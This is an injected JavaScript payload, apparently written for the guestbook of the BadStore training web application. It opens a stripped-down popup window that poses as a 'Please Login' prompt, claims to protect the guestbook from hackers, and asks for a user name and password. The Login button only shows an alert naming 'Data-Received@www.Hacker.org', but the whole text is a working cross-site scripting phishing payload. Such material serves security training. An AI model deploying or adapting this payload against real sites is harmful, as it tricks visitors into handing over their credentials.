<script> myOtherWindow = open("", "secondWindow", "toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=no, resizable=yes,width=575, height=375"); if (myOtherWindow != null); { var otherWindowDefinition = '<html><head><meta http-equiv="content-type" content="text/html;charset=iso-8859-1"><meta name="generator" content="Adobe GoLive 6"> <title>Please Login</title> </head><body bgcolor="#ffffff"> <table width="534" border="0" cellspacing="0" cellpadding="0" cool gridx="16" gridy="16" height="326" showgridx showgridy usegridx usegridy> <tr height="16"> <td width="16" height="325" rowspan="6"></td> <td width="517" height="16" colspan="5"></td> <td width="1" height="16"><spacer type="block" width="1" height="16"></td> </tr> <tr height="80"> <td width="517" height="80" colspan="5" valign="top" align="left" xpos="16"><img src="/images/BadStore.jpg" alt="" height="60" width="350" border="0"></td> <td width="1" height="80"><spacer type="block" width="1" height="80"></td> </tr> <tr height="108"> 	<td content csheight="96" width="256" height="108" colspan="3" valign="top" xpos="16"><font size="4" color="#004b2c" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"><b>To Protect Our Guestbook From Hackers, </b></font> <p><font size="4" color="#004b2c" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"><b><i>Please Login...</i></b></font></p> </td> <td width="261" height="108" colspan="2"></td> <td width="1" height="108"><spacer type="block" width="1" height="108"></td> </tr> <tr height="32"> 	<td content csheight="20" width="192" height="32" valign="top" xpos="16"> <div align="right"> <font color="#004b2c" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"><b>Enter Your User Name :</b></font></div> </td> <td width="16" height="121" rowspan="3"></td> <td width="309" height="32" colspan="3" valign="top" align="left" xpos="224"><input type="text" name="pp_user_id" size="24" tabindex="1" border="0"></td> <td width="1" height="32"><spacer type="block" width="1" height="32"></td> </tr> <tr height="36"> <td content csheight="20" width="192" height="36" valign="top" xpos="16"> <div align="right"> <font color="#004b2c" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"><b>And Your Password :</b></font></div> </td> <td width="309" height="36" colspan="3" valign="top" align="left" xpos="224"><input type="password" name="pp_password" size="24" tabindex="2" border="0"></td> <td width="1" height="36"><spacer type="block" width="1" height="36"></td> </tr> <tr height="53"> <td width="192" height="53"></td> <td width="128" height="53" colspan="2"></td> <td width="181" height="53" valign="top" align="left" xpos="352"><Input type="button" name="Sendit" VALUE="Login" onClick=alert("Data-Received@www.Hacker.org") ></td> <td width="1" height="53"><spacer type="block" width="1" height="53"></td> </tr> <tr height="1" cntrlrow> <td width="16" height="1"><spacer type="block" width="16" height="1"></td> <td width="192" height="1"><spacer type="block" width="192" height="1"></td> <td width="16" height="1"><spacer type="block" width="16" height="1"></td> <td width="48" height="1"><spacer type="block" width="48" height="1"></td> <td width="80" height="1"><spacer type="block" width="80" height="1"></td> <td width="181" height="1"><spacer type="block" width="181" height="1"></td> <td width="1" height="1"></td> </tr> </table> <p></p> </body></html>'; myOtherWindow.document.write(otherWindowDefinition); myOtherWindow.document.close() } </script>